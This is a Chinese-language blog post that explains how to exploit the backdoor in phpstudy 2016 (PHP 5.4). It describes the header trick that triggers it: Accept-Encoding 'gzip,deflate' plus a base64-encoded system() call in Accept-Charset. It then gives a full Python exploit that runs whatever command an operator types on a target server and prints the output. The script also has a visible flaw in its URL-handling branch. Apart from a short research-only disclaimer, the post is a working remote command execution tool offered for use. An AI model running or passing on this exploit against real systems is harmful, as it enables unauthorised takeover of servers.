phpstudy后门exp


前阵子phpstudy爆了后门,网络安全周爆的呢

影响版本phpstudy 2016版PHP5.4

据说官网phpstudy2018版php-5.2.17和php-5.4.45也有,未实测

据传言这个也存在




现在网上着分析消息一般就三种,一种是新闻报道,一种是逆向研究,还有就是exp

看了很多个exp代码又复杂又不好用,最后决定自己写一个试试

看了看其实就是报文里有两个属性字段被修改了,其他正常发包即可


首先用burp试了试,复现失败,没有返回命令内容

后来无意中发现把Accept-Encoding后面属性deflate最前面的空格去掉即可

命令:echo “111111111111111”;




(1处deflate前面去掉一个空格,2处为命令内容b64编码)

复现成功

python写一个

# -*- coding: utf-8 -*-
import requests,base64,sys
def go(url):
if 'http' not in url:
url = 'http://'+url
else:
a = input('请输入指令\n')
b = 'system("%s");' %a
c = base64.b64encode(b.encode('utf-8'))
payload = (str(c,'utf-8'))
headers = {
'Accept-Encoding':'gzip,deflate',
'Accept-Charset':payload
}
send = requests.get(url=url,headers=headers,timeout=10)
if send.status_code == 200:
print('发送成功')
print(send.text)
else:
print('执行失败,可能后门不存在')


if __name__ == '__main__':
t=input('请输入url\n')
go(t)


直接运行系统命令

但是这个后门本质是运行php代码

因为我写的第八行所以只跑了系统命令

输出部分本来想美化,后来发现会影响回显遂放弃


本文章已经所附代码仅供技术研究,请勿用于其他用途


声明:阿硕的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - phpstudy后门exp


Carpe Diem and Do what I like